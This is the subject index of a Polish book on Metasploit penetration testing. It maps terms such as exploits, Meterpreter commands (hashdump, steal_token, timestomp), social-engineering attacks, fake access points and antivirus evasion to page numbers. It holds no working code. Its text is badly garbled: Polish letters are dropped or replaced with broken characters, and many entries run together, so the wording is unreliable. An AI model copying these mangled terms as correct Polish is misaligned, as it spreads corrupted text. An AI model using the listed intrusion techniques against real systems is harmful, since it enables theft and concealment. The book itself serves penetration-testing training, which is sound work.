automatyczne przej�ciesystemu, 89
awaria systemu, 90
Bbackdoor, 28baza danych, 49bezprzewodowy wektor ataku,
208
352 S k o r o w i d z
biay wywiad, 44biblioteka
oledlg.dll, 288SHELL32.DLL, 278user32.dll, 137
biblioteki rdzenia, 240bind shell, 34b�dny adres zwrotny, 275b�dy formatu plików, 163budowa moduu pomocniczego,
173bufor Quick TFTP, 287
Ccel ataku, 44certyfikat SVN, 339ci�g znaków, string, 246CVE, Common Vulnerabilities
and Exposures, 74czynno�ci wst�pne, pre-
engagement interactions, 26
Ddebuger Immunity Debugger,
256debugery, 155, 255DEP, Data Execution
Prevention, 100dugo�� bufora, 264dodatek Railgun, 137domieszka
Msf::Exploit::Remote::Tcp,62
Msf::Auxiliary::Scanner, 62Msf::Exploit::Remote::Tcp,
275Msf::Exploit::Remote::Udp,
285Msf::Exploit::Remote::Seh,
285domieszki, mixins, 62domieszki Meterpretera, 302dostarczanie adunku, 116dost�p do
interfejsu API, 137maszyny docelowej, 191Metasploit Framework, 36plików pomocy, 35
powoki, 233, 289, 324powoki Meterpretera, 112,
204, 220prze�cznika, 61serwera MS SQL, 116systemu, 125, 193wektora ataku
man-left-in-the-middle, 197tabnabbing, 196
dzielenie adunku, 246dzienniki zdarze�, 329
Eegg hunter, 258EIP, extended instruction
pointer, 272eksploatacja, exploitation, 27,
317eksploatacja systemów, 91eliminowanie zych znaków, 267emulacja klawiatury, 204ESP, extended starter pointer,
272exploit, 34
Aurora, 158, 193Collab.collectEmailInfo, 184MS08-067, 99nadpisania rekordu SEH,
283Quick TFTP Pro 2.1, 283tomcat_mgr_deploy, 324
exploityAdobePDF, 181przegl�darek, browser-
based exploits, 152typu client-side, 151, 192
Ffaszywy
punkt dost�pu, 208, 227, 232serwer pocztowy, 233
Fast-Track, 209–225faza
eksploatacji, 317poeksploatacyjna, 28, 319
fazy PTES, 26fikcyjny kod powoki, 277
fingerprinting, 30Fu, 347funkcja
event_manager, 328generate_seh_payload, 288Kontroli Konta
U�ytkownika, 309load auto_add_route, 318payload.encoded, 281powershell_upload_exec,
245PUT HTTP, 324RATTE, 207szyfrowania, 61timestomp, 328tworzenia adunku, 298
fuzz string, 253fuzz testing, 251fuzzery Wi-Fi, 169fuzzing, 252fuzzowanie aplikacji, 251
Ggenerator zmiany formatu, 222generowanie
kodu powoki, 39nazwy pliku, 246
gniazdo, socket, 286GUI, 38
Hhasa community string, 61heap spraying, 153HID, human interface device,
204
IICMP, Internet Control
Message Protocol, 47IDE, Integrated Drive
Electronics, 206identyfikacja zo�liwego kodu,
139identyfikator
adresu IP, 45, 51procesu PID, 294, 299
S k o r o w i d z 353
IDS, intrusion detectionsystems, 40
iframe injection, 193IMAP, Internet Message Access
Protocol, 252implementowanie funkcji
Metasploit Framework, 278importowanie
exploitów, 271, 274exploita SEH, 289raportu, 73, 80
informacje oadowaniu, 233ruchu sieciowym, 133sieci, 45systemie, 133
instalacja Windows XP, 333instrukcja
NOP, 154, 272NOP slide, 272POP, 283rand_text_alpha_upper, 280RENT, 283
instrukcjeasemblera, 156powoki wi�zanej, 157
interaktywna powoka, 207interfejs
API Meterpretera, 300Arduino, 206armitage, 38at0, 230graficzny u�ytkownika, 38IDE, 206msfcli, 36wiersza polece�, 36
interfejsy Metasploit, 35IP spoofing, 51IPS, intrusion prevention
systems, 152
Jjawne testy penetracyjne, 29JDK, Java Development Kit,
181j�zyk
Pearl, 21PowerShell, 242Ruby, 21, 309
KKARMA, 227Karmetasploit, 227–236karta bezprzewodowa, 229keystroke logging, 118klasa auxiliary, 174klonowanie strony, 192, 197klucz
HKEY_CURRENT_USER,133
klucze rejestru, 134kod
powoki, shellcode, 34, 39,155, 276
wasnego moduu, 281koder Power PC, 142kodery, 40kodowanie
adunku, 149adunku MSF, 143polece�, 247polimorficzne, 144shikata_ga_nai, 144
kody operacji, opcodes, 40kolejno�� bajtów, 262, 278komenda, Patrz poleceniekomponent
airbase-ng, 230UAC, 309
kompresor UPX, 149kompresowanie zo�liwych
plików, 150komunikat b�du, 245, 316konfiguracja
adresu IP, 335Karmetasploit, 228, 231Nessus, 76
polityka skanowania, 77raporty, 80
NeXpose, 68–72raporty, 71skanowanie r�czne, 70�rodowisko, site, 68
pakietu SET, 180punktu dost�powego, 230serwera SQL, 334serwera WWW, 333urz�dzenia Teensy, 207
konfigurowanie definicjiexploita, 276
konsola MSFconsole, 35konto
sa, 114, 238z ograniczonymi
uprawnieniami, 309kontrolowanie SEH, 256, 258konwertowanie plików
binarnych, 238
Lliczba
luk, 74w�tków, 57
liczniki, counters, 247link do strony sklonowanej, 198lista
dost�pnych ataków, 216uruchomionych procesów,
294luka
Adobe Flash zero-day, 152Collab.collectEmailInfo, 184MS08-067, 56, 93typu zero-day, 192w WebDAV, 172
luki w zabezpieczeniach, 66
�adunek, payload, 34
binarny, 140binarny MSF, 237odwróconego Meterpretera,
193odwrócony, 96, 106, 164payload.exe, 123payload3.exe, 149penego tunelowania, 207powoki polece�, 135reverse_tcp, 102sprawdzaj�cy porty, 106wielokrotnie zakodowany,
145a�cuch URL, 211�czenie si�
bez uwierzytelniania, 88z baz�, 49z VNC, 87ze zdalnym hostem, 62
354 S k o r o w i d z
Mmaszyny wirtualne, 313, 332mened�er zabezpiecze� kont, 121menu
Fast-Track, 210SET, 184
Metasploit Express, 21, 41Metasploit Pro, 21, 41Metasploitable, 313Meterpreter, 102, 111metoda send_request_cgi, 175migracja procesu, 132, 235modelowanie zagro�e�, threat
modeling, 27, 315modu, module, 34
Aurora, 159dns_enum, 169energizer_duo_detect, 169enumeracji DNS, 169ftp_version, 59hashdump, 120ipidseq, 51keylog_recorder, 119migrate, 132mssql_exec, 239mssql_login, 114, 115mssql_payload, 117mssql_ping, 58, 114mssql_powershell, 237multi/handler, 141portscan syn, 55smb_login, 85smb_version, 56snmp_enum, 60snmp_login, 61ssh_version, 58webdav_scanner, 169wewn�trzny serwera, 316zbierania informacji, 188
moduyfazy poeksploatacyjnej, 135pomocnicze, 167–178
modyfikowanie exploita, 274MSF, Metasploit Framework,
33, 347MSFcli, 36MSFconsole, 35MSFencode, 40, 142MSFpayload, 39MySQL, 49
Nnadpisanie SEH, 257, 283, 286narz�dzia
Metasploit, 38socjotechniczne, 179zautomatyzowane, 225
narz�dzieAutopwn, 89, 210Burp Suite, 316DistCC, 326do amania hase, 121event_manager, 329Fast-Track, 115, 209, 317,
336incognito, 126Interactive Shell, 207Metasploit, 316Meterpreter, 102msfencode, 142, 146msfpayload, 140msfvenom, 150, 348MSSQL Bruter, 215MSSQL Injector, 211nasm_shell.rb, 40netcraft, 45nmap, 47, 99, 112nslookup, 46Social-Engineer Toolkit,
336SQL Injector, 211SQLPwnage, 219, 318vncviewer, 86Web-GUI, 208Wireshark, 133xspy, 89
nasuchiwacz, listener, 34, 318multi-handler, 164odwróconego Meterpretera,
190nasuchiwanie po�cze�
odwróconych, 141Nasm Shell, 40NAT, Network Address
Translation, 55Ninja, 347NOP slide, 153NOP, no-operation instruction,
153notacja CIDR, 53NSEH, Next SE Handler, 286
Oobsuga
b�dów, 176nasuchiwania, 146po�cze�, 297routingu, 130w�tków, 255WebDAV, 172wyj�tków, 283znaków CRLF, 246
odcisk palca, fingerprint, 59, 65odmowa �wiadczenia usug, 253ograniczenia SEH, 258ograniczenie wykonywania
plików, 247okno konfiguracji polityki
skanowania, 77opcja
allports, 108AUTO_DETECT, 181Follow address in stack, 256Java Repeater, 203LHOST, 122LPORT, 102Mass Email Attack, 184RHOST, 122RHOSTS, 52SRVHOST, 160
opcjaTHREADS, 52View/SEH chain, 256
opcjeexploita, 37msfencode, 142nmap, 47skanowania ipidseq, 51
OSINT, open sourceintelligence, 44
ostrze�enie oniebezpiecze�stwie, 203
otwarte porty, 54otwieranie powoki, 147
Ppakiet
Aircrack-ng, 230JDK, 181KARMA, 227SET, 179–208
S k o r o w i d z 355
password cracker, 121pasywne zbieranie informacji,
46PE, Portable Executable, 141pivoting, 55, 127plik
autoexploit.rc, 109autorun.inf, 204calc.exe, 347dhcpd.conf, 228karma.rc, 229messages, 232mssql.rb, 240, 244, 248mssql_commands.rb, 241mssql_powershell.rb, 242payload2.exe, 144resource.rc, 109Subnet1.xml, 50surgemail.exe, 259, 261WScript, 205
pliki.pcap, 133.pde, 206.vmx, 332maszyny wirtualnej, 332PDF, 186pliki zasobów, resource
files, 108podgl�d pulpitu, 131podmiana
ramek iframe, 197stron, 196
podpis apletu, 187podszywanie si� pod adres IP,
51polecenia
Meterpretera, 117, 301, 348MSFcli, 347MSFconsole, 341MSFencode, 346MSFpayload, 346
polecenie./fast-track.py -i, 209./set-web, 208add_group_user, 127airmon-ng start wlan0, 229background, 124db_autopwn, 89db_autopwn –h, 90db_connect, 73db_destroy, 82
db_hosts, 50, 57, 75db_import, 50, 73, 89db_nmap, 53db_services, 54db_status, 49db_vulns, 75debug, 245EHLO, 276exploit, 103, 130getsystem, 124, 163getuid, 125help, 74info, 97, 163irb, 300jmp esp, 40load auto_add_route, 130,
321load nessus, 82load nexpose, 74migrate, 119, 162msf> show auxiliary, 92msf> show exploits, 92msf> show options, 92msf> show payloads, 94msf> show targets, 96msfcli -h, 36msfconsole, 35msfencode -h, 40, 142msfpayload -h, 39msfpescan, 261mssql_ping, 114nessus_connect, 82nessus_policy_list, 82nessus_report_get, 83nessus_report_list, 83nessus_scan_new, 83nessus_scan_status, 83net user, 123netstat -an, 158netstat -antp, 326nexpose_connect -h, 75nexpose_scan, 75nmap, 47ping, 47ps, 119, 125, 294resource, 108resource karma.rc, 231route, 128route print, 128run, 293
run get_local_subnets, 128run hashdump, 132run screen_unlock, 131save, 98screenshot, 117search, 93search scanner/http, 170sessions, 103, 135set, 97setg, 98shell, 103show, 92show advanced, 161show auxiliary, 168show options, 103, 244show targets, 102show_options, 85steal_token, 126sudo, 309sysinfo, 118unset, 97unsetg, 98use multi/handler, 134use priv, 121, 124, 163version, 109
polityka skanowania, scanpolicy, 77
po�czenieodwrócone, 133zwrotne, 102, 347
pomoc msfconsole, 35port
nasuchiwania serwera, 57serwera SQL, 113
portal dost�powy do sieci Wi-Fi, 233
porty usug, 107POST parameter attack, 212PostgreSQL, 49potwierdzanie logowania SMB,
84poufne informacje, 195PowerShell, 242powoka
irb, 137Ruby, 137wi�zania, 106, 155
poziom uprawnie�, 123procedura skadowana
xp_cmdshell, 115, 238, 241procedury skadowane, 212
356 S k o r o w i d z
procesexplorer.exe, 119iexplorer.exe, 295surgemail.exe, 254
programbrute-forcer, 115Encase, 328Immunity Debugger, 155LAN Manager, 120NT LAN Manager, 120NT LAN Manager v, 120multi-handler, 146obsugi nasuchiwacza, 124
programyantywirusowe, 132, 139kompresuj�ce, 149
protokóICMP, 47IMAP, 252RDP, 319SMTP, 323SNMP, 60SSH, 58SSL, 61TFTP, 285UDP, 57
przechwytywaniebanerów, 27, 66, 322pakietów, 133plików cookie, 233uderze� klawiatury, 118
przekierowanie portów, 181przepenianie
bufora, buffer overflow, 252,273
sterty, heap overflow, 130stosu, 251
przesyanie adunku, 164przydzielanie adresów IP, 231przygotowanie raportu,
reporting, 28PTES, Penetration Testing
Execution Standard, 25Pulpit zdalny, 320punkt przerwania, 157, 263punkt wstrzykni�cia SQL, 212puste hasa, 86puste instrukcje, 153
Rrandomizacja, 279raporty, 71, 80RATTE, 207RDP, Remote Desktop Protoco,
319rejestr
EIP, 272, 277ESP, 272
rejestrator pakietów, 133rejestrowanie klawiatury, 89, 118rejestry, 272rekord SEH, 261reverse shell, 34RO, read-only, 60rozmiary adunków, 260RPC, Remote Procedure Call,
111RW, read/write, 60
SSAM, Security Account
Manager, 121scrapowanie systemu, 133SEH, Structured Exception
Handler, 255, 283sekwencja POP-POP-RETN,
261, 263sekwencyjne identyfikatory IP,
51serwer
Apache Tomcat, 323Autopwn, 229browser_autopwn, 229DHCP, 230, 332DNS, 45MS SQL, 57pocztowy, 46POP3, 232proxy, 178Samba, 104SNMP, 60SQL, 113, 336SSH, 58VNC, 86WWW, 66WWW Python, 181X11, 88
SET, Social-Engineer Toolkit,179, 336
skanerNessus, 76NeXpose, 67OpenVAS, 89open_x11, 88scanner/portscan/tcp, 130SMB Login Check Scanner,
84smb_version, 57VNC, 86VNC Authentication None,
86vnc_auth, 88
skaneryluk w zabezpieczeniach, 30niestandardowe, 61portów, 167wyspecjalizowane, 84znaczników usug, 167
skanowaniebloku wiadomo�ci serwera,
56FTP, 59jaowe TCP, 51luk w zabezpieczeniach, 65niepo�wiadczone, 74portów, 47, 54, 130, 321,
326po�wiadczone, 74serwera SSH, 58sieci, 319skryte TCP, 47systemu Metasploitable, 321ukierunkowane, targeted
scan, 56za pomoc� wtyczki, 82
skokdo fikcyjnego kodu powoki,
279short jump, 259, 288
skrót hasa, 120, 132skrypt
getgui, 320multi_meter_inject, 294packetrecorder, 133persistence, 133PowerShell, 238scraper, 133
S k o r o w i d z 357
skrypty Meterpretera, 131, 293,304
SMB, Server Message Block, 56SNMP, Simple Network
Management Protocol, 60socjotechnika, 179spear-phishing, 163spryskiwanie sterty, heap
spraying, 153SQL injection, 29, 210SSH, Secure Shell, 58SSL, Secure Sockets Layer, 61standard PTES, 25, 64strona sklonowana, 199strony �ródowe HTTP, 196sygnatury, signatures, 139system
Back|Track, 44Linux, 128Ubuntu, 104Windows XP, 128
systemydetekcji wama�, 40, 152,
288IDS, 288przekazywania obrazu, 86
szablonboilerplate, 242pliku wykonywalnego, 146
szyfrowanie w HTTP, 207
��ledzenie porz�dku pakietów,
51�ledzenie ruchu, 133
Ttablica BadChars, 266tabnabbing, 196technika pass-the-hash, 122test
„biaego kapelusza”, 29penetracyjny, 313
testowanie exploita, 276testy
jawne, 29penetracyjne, 25, 30, 330ukryte, 30
t�czowe tablice, rainbow tables,120
TFTP, Trivial File TransferProtocol, 285
tokenihazdomainadmin, 127Kerberos, 125
tokeny personifikacji, 125transfery stref, 45tryb pracy karty
bezprzewodowej, 229tunel zwrotny RDP, 320tunelowanie, 131tworzenie
bazy danych, 73faszywego punktu dost�pu,
230klonu strony, 197moduu, 241pliku wykonywalnego, 306polityki skanowania, 77skryptu Meterpretera, 304sygnatur, 146wasnych exploitów, 251wasnych moduów, 237
tylne drzwi, backdoor, 28typy
testów penetracyjnych, 29wstrzykni�cia SQL, 219
UUAC, 309UAC Safe, 309UI, user interface, 301ukryte testy penetracyjne, 30unieruchamianie
oprogramowaniaantywirusowego, 132
unikanie wykrycia, 139uprawnienia, 123uprawnienia na poziomie
systemu, 116uruchamianie
agenta, 133armitage, 38exploita, 192, 249exploita powoki, 243adunku, 37, 147maszyn wirtualnych, 332
Metasploita, 190Nessusa, 79NeXpose, 74Nmap, 53procedury xp_cmdshell, 241skryptu, 131
urz�dzenieTeensy USB HID, 205USB, 206
usugaRPC, 111SQL Server Browser, 336SQL Server Service, 336
usugi podatne na ataki, 322ustawienia domy�lne
prze�cznika, 61usuwanie
agenta, 133fikcyjnego kodu powoki,
280NOP slide, 280VBScript, 134
uwierzytelnianieVNC, 86w trybie mieszanym, 215
uzyskiwanie adresu zwrotnego,261
VVMware Player, 332VMware Server, 332VNC, virtual network
computing, 86
Wwarto�� skrótu, hash values, 118wektor ataku, attack vector, 180
spear-phishing, 181Teensy USB HID, 204wieloaspektowego, 199
wektory ataków WWW, Webattack vectors, 187
wi�zanie, bind, 133wielokrotne
kodowanie, multi-encoding,144
zapytania, 203
358 S k o r o w i d z
wiersz polece�, 36wstrzykiwanie r�czne, 213wstrzykni�cie
agenta, 133kodu SQL, 210ramki iframe, 193zapytania SQL, SQL
injection, 29wtyczka
Nessus Bridge, 81--script=smb-check-vulns,
100sounds, 108
wykrywanieb�dów, 168adunku, 142otwartych portów, 314wersji systemu, 112
wyniki skanowania, 67wyodr�bnienie skrótów, 120wyszukiwanie whois, 44, 45wy�wietlanie komunikatów, 300wywoania API, 137, 301
Zzabezpieczenie DEP, 100zacieranie �ladów, 327zainfekowane no�niki danych,
204zainfekowany plik PDF, 186zakres
adresów, 53portów, 107
zamiatanie SNMP, 60zapytania sparametryzowane,
212zatruwanie pami�ci podr�cznej,
224zbieranie
informacji, intelligencegathering, 26, 64, 314aktywne, 47pasywne, 44po�rednie, 44
nazw u�ytkowników, 194po�wiadcze�, harvesting,
194, 232zdalne wykonywanie kodu, 266zestaw instrukcji JMP, 272zjazd, slide, 272ze znaki, bad characters, 266
zo�liwakontrolka ActiveX, 235strona, 191
zo�liwee-maile, 152oprogramowanie, malware,
327pliki, 163
zo�liwyaplet Javy, 187, 203bufor, 276link, 152serwer WWW, 198
zmiana formatu, 222zmienna cmd, 241znak
apostrofu, 316pionowej kreski, 63
znaki CRLF, 246zrandomizowany bufor, 281zrzut ekranu
pulpitu, 117z maszyny docelowej, 202
zwi�kszanie uprawnie�, 123,163